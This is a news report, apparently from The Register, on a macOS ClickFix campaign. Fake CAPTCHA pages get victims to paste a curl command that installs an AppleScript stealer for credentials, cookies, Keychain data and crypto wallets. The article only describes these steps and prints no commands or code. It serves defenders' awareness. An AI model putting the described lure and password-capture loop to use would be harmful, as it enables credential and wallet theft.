macOS ClickFix attacks deliver AppleScript stealers to snarf credentials, wallets

April 21, 2026 TH Author

A ClickFix campaign targeting macOS users delivers an AppleScript-based infostealer that collects credentials and live session cookies from 14 browsers, 16 cryptocurrency wallets, and more than 200 extensions.

Netskope Threat Labs researcher Jan Michael Alcantara told The Register the team initially observed the campaign last month, and has seen similar instances as recently as last week.

ClickFix is a super popular social engineering tactic used to trick people into executing malicious commands on their own computers, usually by clicking a fake computer problem fix or CAPTCHA prompt.

While the researchers don’t know who the cookie thief is, they note the malware can infect both Windows and macOS machines – Netskope previously warned about the Windows-focused attacks – by using a client-side JavaScript to filter victims by user-agent, ignoring mobile devices and directing desktop users to either a Windows or macOS-specific payload.

Victims, we’re told, are in Asia and work in the finance sector.

Upon detecting a desktop environment, the malware directs users to a fake CAPTCHA page, performs another inspection to determine the specific desktop OS, and then checks for macOS-specific strings within the user-agent that are used to load the AppleScript-based stealer.

The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a “verification code” into the search feature. The phony code is a curl command, and as soon as the victim hits Enter and executes it on their computer, the command silently downloads a malicious script from the attacker-controlled server. The script collects the victim’s username, hardcodes the command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ to stage all of the stolen data before sending it to the C2.

Apple did not respond to The Register‘s inquiries for this story, but it’s important to note that the latest versions of macOS Tahoe (26.4) or macOS Sequoia include a new feature designed to block ClickFix attacks. It alerts users when they attempt to paste potentially malicious commands into the Terminal application, so update your operating system to help detect and prevent these types of ClickFix attacks.

But if a user is running an older OS version, or for some reason ignores the macOS warning and clicks the “paste anyway” option, the malware moves on to the credential-harvesting stage by deploying a very sneaky social engineering dialog box that loads the authentic macOS system lock icon from local resources. Users see the lock, think it’s a legit Apple dialog box, and then enter their system password.

The malware also takes extreme measures to force credential entry. It only has a single action button – there’s no option for users to close the dialog box window – and it keeps reappearing until the victim enters a valid password.

This is what the malware steals

User passwords are validated in real time, using macOS’s directory services authentication, and if incorrect, the dialog box reappears, with this loop continuing until the person provides a correct password.

Next, it snarfs up all sorts of user data, including the macOS Keychain (which stores saved passwords, Wi-Fi credentials, secure notes, and cryptographic keys), while the malicious dialog loop captures the victim’s password in plaintext.

The stealer also targets 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc. For each of these, it searches user profiles and steals session tokens, authentication cookies, saved passwords and other autofill info including credit card numbers, data from more than 200 browser extensions, and extension databases.

This browser-extension theft is especially insidious as the miscreants’ malware is configured to swipe details from cryptocurrency wallets including MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific ones. It also collects password manager credentials from LastPass, 1Password, Dashlane, Bitwarden, two-factor authentication apps including Authy and Google Authenticator extensions, and various VPN and single sign-on extensions used for corporate access.

In addition to the Chromium browser data, the malware steals cookie databases, form-autofill data, master passwords, and saved credentials from Firefox and Waterfox, another Firefox-based browser.

And beyond browser extensions, the stealer targets 16 standalone desktop cryptocurrency wallet applications: Exodus, Atomic, Electrum, Coinomi, Guarda, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, Dash Core, Dogecoin Core, Monero, Wasabi, Sparrow, Electron Cash, and Electrum-LTC.

Alcantara told us that this infostealer campaign is unrelated to one that also targeted macOS users’ credentials and cryptocurrency wallets that Microsoft last week attributed to North Korean criminals despite similar techniques – such as using social engineering even when malware is running.

Netskope has published a full list of indicators of compromise and scripts related to this malware in its GitHub repository, so give that a read. And as the threat hunters note, “this campaign serves as a reminder that social engineering remains a primary threat to both Windows and macOS users.” ®